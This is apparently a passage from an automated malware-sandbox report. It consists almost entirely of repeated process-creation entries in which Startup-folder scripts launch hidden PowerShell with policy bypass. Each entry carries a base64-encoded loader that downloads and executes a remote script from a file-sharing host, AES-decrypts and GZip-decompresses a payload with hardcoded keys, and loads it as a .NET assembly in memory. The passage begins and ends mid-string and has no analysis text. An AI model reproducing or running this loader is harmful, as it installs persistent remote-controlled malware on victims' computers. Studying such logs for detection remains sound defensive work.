gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4b5a513a.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b9543b98.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_9932b526.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_47a8d5aa.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b38e7755.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNk